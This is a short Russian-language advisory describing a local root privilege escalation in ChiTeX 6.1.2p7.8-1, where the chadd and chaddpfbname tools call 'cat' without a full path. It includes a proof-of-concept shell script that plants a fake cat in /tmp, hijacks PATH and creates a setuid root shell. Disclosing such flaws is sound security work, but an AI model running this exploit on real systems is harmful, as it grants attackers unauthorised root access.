Уязвимость обнаружена в ChiTeX. Локальный пользователь может получить root привилегии на системе. 

Программное обеспечение выполняет системный запрос, ссылающийся на команду
cat, не используя явный путь к cat утилите. В результате, локальный пользователь может создать программу с именем
cat, которая будет расположена в каталоге в системном пути и затем вызвать ChiTeX, который выполнить код пользователя с root привилегиями. Уязвимые программы — chadd и chaddpfbname. Пример: 

#!/bin/sh
echo ‘owned’ > ‘psfontsmap@’
export psfontsmap=3D/tmp/owned
echo «/bin/cp /bin/sh /tmp/.sh» > /tmp/cat
echo «/bin/chmod 4755 /tmp/.sh» >> /tmp/cat
chmod +x /tmp/cat
cd /tmp
export PATH=3D»/tmp:$PATH»
/usr/local/bin/chaddpfbname
/tmp/.sh -c id
/tmp/.sh

Уязвимость обнаружена в ChiTex 6.1.2p7.8-1.



Оставить мнение